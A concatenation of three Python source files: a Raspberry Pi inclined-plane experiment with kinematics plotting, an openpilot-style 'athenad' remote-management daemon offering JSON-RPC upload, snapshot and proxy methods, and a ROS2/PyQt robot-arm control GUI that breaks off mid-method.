self.fig, (ax1, ax2, ax3) = plt.subplots(3, 1, figsize=(7, 8))
plt.subplots_adjust(top=0.95, bottom=0.05)
ax1.set_title("Position v. Time")
ax1.set_xlabel("Time(s)")
ax1.set_xlim(left=0.0)
ax1.set_ylabel("Position(m)")
ax1.set_ylim(bottom=0.0)
ax1.grid(True)
ax1.autoscale(True)
ax2.set_title("Velocity v. Time")
ax2.set_xlabel("Time(s)")
ax2.set_xlim(left=0.0)
ax2.set_ylabel("Velocity(m/s)")
ax2.set_ylim(bottom=0.0)
ax2.grid(True)
ax2.autoscale(True)
ax3.set_title("Acceleration v. Time")
ax3.set_xlabel("Time(s)")
ax3.set_xlim(left=0.0)
ax3.set_ylabel("Acceleration(m/s^2)")
ax3.set_ylim(bottom=0.0)
ax3.grid(True)
ax3.autoscale(True)
self.ax = {
"Position": ax1,
"Velocity": ax2,
"Acceleration": ax3
}
def take_derivative(self, eq):
# second degree polynomial
if len(eq.c) == 3:
new_eq = eq.deriv()
elif len(eq.c) == 2:
new_eq = eq.deriv()
else:
raise Exception("Your equation must be either of 1st or 2nd degree")
return new_eq
def trim_data(self, data):
x = data[0]
y = data[1]
new_x = list()
new_y = list()
for t in range(0, len(y)):
x[t] = x[t] - (x[0] + x[1] + x[2] + x[3] + x[4] + x[5] + x[6] + x[7] + x[8] + x[9])/10.0
y[t] = y[t] - (y[0] + y[1] + y[2] + y[3] + y[4] + y[5] + y[6] + y[7] + y[8] + y[9])/10.0
for t, pos in enumerate(y):
if pos < 0.35 and pos > 0.03:
new_x.append(x[t])
new_y.append(pos)
return [new_x, new_y]
def plot(self, graph_of, plot_data):
self.ax[graph_of].plot(plot_data[0], plot_data[1], **{"marker": "o"})
def plot_equation(self, graph_of, data_lists, eq=None):
x = data_lists[0]
y = data_lists[1]
t = np.linspace(0, x[-1] + 0.1, y[-1] + 10)
if graph_of == "Position":
p_pos = np.poly1d(np.polyfit(x, y, 2))
elif graph_of == "Velocity" or graph_of == "Acceleration":
p_pos = eq
else:
raise Exception("You can only plot Position, Velocity or Acceleration")
self.ax[graph_of].plot(x, y, 'o', t, p_pos(t), '-')
return p_pos
def show(self):
plt.show()
from RpiMotorLib import rpi_dc_lib
from RPi import GPIO
class InclinedSurface(Thread):
def __init__(self):
super().__init__()
self.motor = rpi_dc_lib.L298NMDc(19, 13, 26, 50)
self.pot_angle = 0.0
self.sonar = 0
self.button_state = False
self.is_running = True
self.recorded_data = list()
self.enabled_recording = False
self.percent = 0
def run(self):
import serial # Import Serial Library
arduinoSerialData = serial.Serial('/dev/ttyS0', 57600) # Create Serial port object called arduinoSerialData
while self.is_running:
try:
my_data = arduinoSerialData.readline()
str_my_data = str(my_data, encoding="utf-8").split("\r\n")[0]
list_my_data = str_my_data.split(",")
pot = int(list_my_data[0])
self.pot_angle = -0.257 * pot + 219.0
sonar = float(list_my_data[1])
self.sonar = sonar if sonar < 40 else self.sonar
self.button_state = int(list_my_data[2])
if self.enabled_recording:
measurement = {"angle": self.pot_angle,
"distance": self.sonar,
"time_stamp": time.time()}
self.recorded_data.append(measurement)
if self.percent > 0:
self.motor.backward(self.percent)
elif self.percent < 0:
self.motor.forward(-self.percent)
else:
self.motor.stop(0)
if not (-7 < self.pot_angle < 60):
self.percent = 0
except:
pass
def start_recording(self):
self.enabled_recording = True
def end_recording_data(self):
self.enabled_recording = False
initial_time = self.recorded_data[0]["time_stamp"]
for index in range(len(self.recorded_data)):
self.recorded_data[index]["time_stamp"] = self.recorded_data[index]["time_stamp"] - initial_time
return self.recorded_data
def set_motor_speed(self, percent):
self.percent = percent
def get_to_starting_point(self):
if self.pot_angle > 0:
while self.pot_angle > 0:
self.set_motor_speed(-50)
time.sleep(0.01)
else:
while self.pot_angle < 0:
self.set_motor_speed(50)
time.sleep(0.01)
self.set_motor_speed(0)
print("\n************\n")
print("The Mechanism has been set to its default position. Ready to set motor speed")
print("\n************\n")
system = InclinedSurface()
system.start()
vis = Vision(system)
vis.start()
system.get_to_starting_point()
while True:
try:
val = input("Set Motor:")
try:
if val == "default":
system.get_to_starting_point()
else:
system.set_motor_speed(int(val))
except:
print("\nOnly decimal numbers allowed!\n")
except KeyboardInterrupt:
print("\nexiting\n")
system.is_running = False
vis.is_running = False
system.set_motor_speed(0)
time.sleep(0.5)
exit()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import version, get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://api.retropilot.org:4040')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if i is not None]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
dongle_id = Params().get("DongleId", encoding='utf-8')
api = Api(dongle_id)
manage_tokens(api)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
# params.delete("PrimeRedirected")
manage_tokens(api)
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
pass
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
pass
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
except socket.timeout:
pass
# try:
# r = requests.get("http://api.retropilot.org/v1/me", allow_redirects=False,
# headers={"User-Agent": f"openpilot-{version}"}, timeout=15.0)
# if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
# params.put_bool("PrimeRedirected", True)
# except Exception:
# cloudlog.exception("athenad.socket_timeout.exception")
# params.delete("LastAthenaPingTime")
# except Exception:
# cloudlog.exception("athenad.main.exception")
# conn_retries += 1
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
# time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
robot_gui.py
|
import sys
import time
import ast
import csv
import os
import math
import threading
import numpy
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from sensor_msgs.msg import JointState
from robot_msgs.msg import GuiToRobot, RobotToGui
from ament_index_python.packages import get_package_share_directory
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
class CommVariables():
trigger_node = None
trigger_ui = None
to_robot = GuiToRobot()
from_robot = JointState()
to_robot.gui_control_enabled = False
to_robot.gui_speed_control = 50
to_robot.gui_joint_control = []
node_name = ""
saved_poses_file = ""
joint_names = []
joint_limit_max = []
joint_limit_min = []
no_of_joints = 0
joint_tolerance = 0.01
poses = {}
def load_poses(file):
result = {}
with open(file, 'r') as joint_csv:
joint_csv_reader = csv.reader(joint_csv, delimiter=':')
for row in joint_csv_reader:
if len(row) == 2 and len(ast.literal_eval(row[1])) == CommVariables.no_of_joints:
result[row[0]] = rad_pose_to_deg(ast.literal_eval(row[1]))
return result
def pose_from_position(poses, joints):
result = "unknown"
for pose, position in poses.items():
if len(position) != len(joints):
continue
if all(numpy.isclose(position[i], joints[i], atol=CommVariables.joint_tolerance) for i in range(len(joints))):
result = pose
break
return result
def rad_pose_to_deg(pose):
return list(map(lambda x: 180*x/math.pi, pose))
def deg_pose_to_rad(pose):
return list(map(lambda x: x*math.pi/180, pose))
class RobotGUI(Node, CommVariables):
def __init__(self):
super().__init__(
node_name= "robot_gui"
)
CommVariables.trigger_node = self.trigger
CommVariables.node_name = self.get_namespace() + "/" + self.get_name()
CommVariables.saved_poses_file = self.declare_parameter("saved_poses_file").value
CommVariables.joint_names = self.declare_parameter("joint_names").value
CommVariables.no_of_joints = len(CommVariables.joint_names)
# for some reason these parameters becomes ([...]) so we need to [0] when using
CommVariables.joint_limit_max = self.declare_parameter("joint_limit_max", value=[180]*self.no_of_joints).value,
CommVariables.joint_limit_min = self.declare_parameter("joint_limit_min", value=[-180]*self.no_of_joints).value,
CommVariables.joint_tolerance = 180.0/math.pi * self.declare_parameter("joint_tolerance", value=0.05).value
CommVariables.poses = load_poses(CommVariables.saved_poses_file)
CommVariables.to_robot.gui_joint_control = [0.0]*self.no_of_joints
self.joint_state_subscriber = self.create_subscription(
JointState,
"joint_states",
self.joint_state_callback,
10)
self.gui_to_robot_publisher = self.create_publisher(
GuiToRobot,
"gui_to_robot",
10)
print("print HEJ gui node")
time.sleep(1)
CommVariables.trigger_ui()
def trigger(self):
print("trigger node")
self.gui_to_robot_publisher.publish(CommVariables.to_robot)
def joint_state_callback(self, data):
CommVariables.from_robot = data
CommVariables.trigger_ui()
class Window(QWidget, CommVariables):
triggerSignal = pyqtSignal()
to_robot_changed_signal = pyqtSignal()
from_robot_changed_signal = pyqtSignal()
poses_changed_signal = pyqtSignal()
force_slider_signal = pyqtSignal()
def __init__(self, parent=None):
super(Window, self).__init__(parent)
CommVariables.trigger_ui = self.trigger
self.triggerSignal.connect(self.update_state_variables)
print("HEJ from window")
self.loaded = False
def changed_to_robot():
CommVariables.trigger_node()
self.to_robot_changed_signal.connect(changed_to_robot)
def trigger(self):
self.triggerSignal.emit()
def update_state_variables(self):
if not self.loaded:
self.loaded = True
self.load_window()
self.from_robot_changed_signal.emit()
def load_window(self):
print("LOADING UI")
grid = QGridLayout()
self.labels = self.make_label_boxes()
self.sliders = self.make_sliders()
self.set_boxes = self.make_set_boxes()
self.gui_control_box = self.make_gui_control_box()
self.estop_box = self.make_estop_box()
self.speed_box = self.make_speed_box()
self.pose_saver_box = self.make_pose_box()
self.pose_goto_box = self.make_pose_goto_box()
self.current_pose_box = self.make_current_pose_box()
# populate the grid with widgets:
for i, s in enumerate(self.sliders):
grid.addWidget(s['box'], i, 0)
for i, l in enumerate(self.labels):
grid.addWidget(l['box2'], i, 1)
grid.addWidget(l['box1'], i, 2)
grid.addWidget(l['box3'], i, 3)
for i, sb in enumerate(self.set_boxes):
grid.addWidget(sb['box'], i, 4)
grid.addWidget(self.speed_box, 6, 0, 1, 4)
grid.addWidget(self.pose_saver_box, 7, 0, 1, 4)
grid.addWidget(self.pose_goto_box, 8, 0, 1, 4)
grid.addWidget(self.current_pose_box, 9, 0, 1, 2)
grid.addWidget(self.estop_box, 9, 2, 1, 1)
grid.addWidget(self.gui_control_box, 9, 3, 1, 1)
self.trigger_enabled()
self.setLayout(grid)
self.setWindowTitle(CommVariables.node_name)
self.resize(600, 250)
# TODO. Change this to signals as well
def trigger_enabled(self):
for l in self.labels:
l['ref_rad'].setEnabled(CommVariables.to_robot.gui_control_enabled)
l['ref_deg'].setEnabled(CommVariables.to_robot.gui_control_enabled)
for s in self.sliders:
s['slider'].setEnabled(CommVariables.to_robot.gui_control_enabled)
for x in self.set_boxes:
x['button'].setEnabled(CommVariables.to_robot.gui_control_enabled)
self.speed_box.setEnabled(CommVariables.to_robot.gui_control_enabled)
self.pose_saver_box.setEnabled(CommVariables.to_robot.gui_control_enabled)
def make_label_boxes(self):
result = []
for i, name in enumerate(CommVariables.joint_names):
label_box_1 = QGroupBox("ref_rad")
ref_rad = QLabel('0.0')
label_box_1_layout = QVBoxLayout()
label_box_1_layout.addWidget(ref_rad)
label_box_1.setLayout(label_box_1_layout)
label_box_1.setMinimumWidth(90)
label_box_1.setMaximumWidth(90)
label_box_2 = QGroupBox("ref_deg")
ref_deg = QLabel('0')
label_box_2_layout = QVBoxLayout()
label_box_2_layout.addWidget(ref_deg)
label_box_2.setLayout(label_box_2_layout)
label_box_2.setMinimumWidth(90)
label_box_2.setMaximumWidth(90)
label_box_3 = QGroupBox("act_rad")
act_rad = QLabel('0.0')
label_box_3_layout = QVBoxLayout()
label_box_3_layout.addWidget(act_rad)
label_box_3.setLayout(label_box_3_layout)
label_box_3.setMinimumWidth(90)
label_box_3.setMaximumWidth(90)
label_box_3.setMinimumWidth(90)
label_box_3.setMaximumWidth(90)
def changed_act(i, label):
value = CommVariables.from_robot.position[i]
label.setText(str(round(value, 5)))
self.from_robot_changed_signal.connect(lambda i = i, label = act_rad: changed_act(i, label))
def changed_ref(i, deg_label, rad_label):
value = CommVariables.to_robot.gui_joint_control[i]
rad_label.setNum(value)
deg_label.setText('{}'.format(round(value * 180 / math.pi, 5)))
self.to_robot_changed_signal.connect(
lambda i = i, deg_label = ref_deg, rad_label=ref_rad:
changed_ref(i, deg_label, rad_label))
result.append({
"name": name,
"box1": label_box_1,
"ref_rad": ref_rad,
"box2": label_box_2,
"ref_deg": ref_deg,
"box3": label_box_3,
"act_rad": act_rad,
})
return result
def make_sliders(self):
result = []
for i, name in enumerate(CommVariables.joint_names):
max_limit = CommVariables.joint_limit_max[0][i]
min_limit = CommVariables.joint_limit_min[0][i]
slider_box = QGroupBox(name)
slider = QSlider(Qt.Horizontal)
slider_box_layout = QVBoxLayout()
slider.setFocusPolicy(Qt.StrongFocus)
slider.setTickPosition(QSlider.TicksBelow)
slider.setTickInterval(5000)
slider.setMinimum(min_limit)
slider.setMaximum(max_limit)
slider.setSingleStep(1)
slider.setMinimumWidth(300)
slider_box_layout.addWidget(slider)
slider_box.setLayout(slider_box_layout)
slider.setValue(0.0)
result.append({"box": slider_box, "slider": slider})
def slider_change(value, joint_no):
CommVariables.to_robot.gui_joint_control[joint_no] = value * math.pi / 180
self.to_robot_changed_signal.emit()
slider.valueChanged.connect(lambda value=slider.value(), joint_no=i: slider_change(value, joint_no))
def force_slider(i, s):
s.setValue(180*CommVariables.to_robot.gui_joint_control[i]/math.pi)
self.force_slider_signal.connect(lambda dummy=False, i=i, s=slider: force_slider(i, s))
return result
def make_set_boxes(self):
result = []
for i in range(CommVariables.no_of_joints):
line_box = QGroupBox("set_ref_deg")
line = QLineEdit()
line.setMinimumWidth(50)
button = QPushButton('set')
line_box_layout = QHBoxLayout()
line_box_layout.addWidget(line)
line_box_layout.addWidget(button)
line_box.setLayout(line_box_layout)
def clicked(jointno, set_box):
value = int(set_box.text())
CommVariables.to_robot.gui_joint_control[jointno] = value * math.pi / 180
self.force_slider_signal.emit()
button.clicked.connect(lambda checked, jointno=i, set_box=line: clicked(jointno, set_box))
result.append({"box": line_box, "button": button, "edit": line})
return result
def make_gui_control_box(self):
radio_box = QGroupBox("gui_control")
radio_box_layout = QHBoxLayout()
radio = QRadioButton("enabled")
radio.setChecked(CommVariables.to_robot.gui_control_enabled)
radio_box_layout.addWidget(radio)
radio_box.setLayout(radio_box_layout)
def toggle():
CommVariables.to_robot.gui_control_enabled = radio.isChecked()
self.trigger_enabled()
self.trigger_node()
radio.toggled.connect(toggle)
return radio_box
def make_estop_box(self):
stop_box = QGroupBox("emergency_stop")
stop_box_layout = QHBoxLayout()
stop_button = QPushButton("STOP")
stop_button.setMaximumWidth(80)
stop_box_layout.addWidget(stop_button)
stop_box.setLayout(stop_box_layout)
def stop_button_clicked():
print('EMERGENCY STOP')
CommVariables.to_robot.gui_control_enabled = True
for i, j in enumerate(CommVariables.from_robot.position):
CommVariables.to_robot.gui_joint_control[i] = j
self.force_slider_signal.emit()
stop_button.clicked.connect(stop_button_clicked)
return stop_box
def make_speed_box(self):
speed_box = QGroupBox("robot_speed")
speed_box_layout = QHBoxLayout()
speed_slider = QSlider(Qt.Horizontal)
speed_slider.setFocusPolicy(Qt.StrongFocus)
speed_slider.setTickPosition(QSlider.TicksBothSides)
speed_slider.setTickInterval(10)
speed_slider.setMinimum(0)
speed_slider.setMaximum(100)
speed_slider.setSingleStep(1)
speed_slider.setMinimumWidth(200)
speed_slider.setValue(CommVariables.to_robot.gui_speed_control)
speed_line = QLineEdit("%")
speed_line.setMaximumWidth(80)
speed_button = QPushButton("set")
speed_box_layout.addWidget(speed_slider)
speed_box_layout.addWidget(speed_line)
speed_box_layout.addWidget(speed_button)
speed_box.setLayout(speed_box_layout)
def speed_slider_change():
CommVariables.to_robot.gui_speed_control = speed_slider.value()
self.to_robot_changed_signal.emit()
def speed_button_clicked():
speed_slider.setValue(int(speed_line.text()))
speed_button.clicked.connect(speed_button_clicked)
speed_slider.valueChanged.connect(speed_slider_change)
return speed_box
def make_pose_box(self):
'''
TODO: Save poses back to the file
'''
pose_saver_box = QGroupBox("pose_saver")
pose_saver_box_layout = QHBoxLayout()
pose_saver_label = QLabel("pose_name")
pose_saver_line = QLineEdit("some_pose_name")
pose_saver_update_button = QPushButton("update")
pose_saver_delete_button = QPushButton("delete")
pose_saver_box_layout.addWidget(pose_saver_label)
pose_saver_box_layout.addWidget(pose_saver_line)
pose_saver_box_layout.addWidget(pose_saver_update_button)
pose_saver_box_layout.addWidget(pose_saver_delete_button)
pose_saver_box.setLayout(pose_saver_box_layout)
pose_saver_box.setEnabled(False)
def pose_saver_update_button_clicked():
pose_name = pose_saver_line.text()
deg_poses = rad_pose_to_deg(CommVariables.from_robot.position)
CommVariables.poses[pose_name] = list(deg_poses)
self.poses_changed_signal.emit()
pose_saver_update_button.clicked.connect(pose_saver_update_button_clicked)
def pose_saver_delete_button_clicked():
pose_name = pose_saver_line.text()
CommVariables.poses.pop(pose_name, None)
self.poses_changed_signal.emit()
pose_saver_delete_button.clicked.connect(pose_saver_delete_button_clicked)
